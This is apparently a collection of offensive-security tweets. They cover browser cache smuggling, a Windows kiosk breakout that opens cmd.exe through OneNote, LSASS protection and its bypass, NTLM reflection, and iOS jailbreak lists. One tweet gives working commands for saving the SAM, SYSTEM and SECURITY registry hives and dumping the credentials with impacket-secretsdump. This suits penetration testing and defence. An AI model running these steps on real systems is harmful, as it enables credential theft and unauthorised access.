Daniel Nemeth

I spent some time exploring browser cache smuggling, where visiting a webpage can lead to malware delivery. Surprisingly, it is possible to execute Chrome’s original cache file without renaming it, while also achieving persistence. More details below: https://t.co/rFrcKyuh31

ZX Security is on the lookout for two new roles at the moment, a Project Coordinator (https://t.co/wgJkiQHHZn) and Penetration Tester (https://t.co/2DpyweirdV) . Apply via Seek! :)

Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

Defenders should deploy this settings: HKLM\SYSTEM\CurrentControlSet\Control\Lsa Dword: RunAsPPL Value: 1 Protects dumping of Lsass with a simple registry value. Encountered that on an engagement recently. 🤯 Mimikatz driver needed to bypass Details https://t.co/6RICpXQku4

NTLM reflection is back to haunt windows. Read about Ghost Potato here (this time with a fixed link): https://t.co/sM9aGjwpxg

Would people be interested in a 2 day process injection training? I'm thinking about doing one after all the POCs I have done in this area. It would cover many of the techniques along with how to develop code for them. Please RT.

How to steal SAM and cached credentials without fancy tools. 1) reg save hklm\sam c:\SAM reg save hklm\system c:\SYSTEM reg save hklm\security c:\SECURITY 2) Copy to Linux host. 3) impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

iOS 12.0 - 12.1 Jailbreak Lists : Umang Raghuvanshi - iOS 12.0 - 12.1 Jailbreak.. SorryMyBad - iOS 12.0 - 12.1 Jailbreak.. KeenLab - iOS 12.0 - 12.1 Jailbreak.. Qwertyoruiopz - iOS 12.0 - 12.1 Jailbreak.. PanguTeam - iOS 12.0 - 12.1 Jailbreak..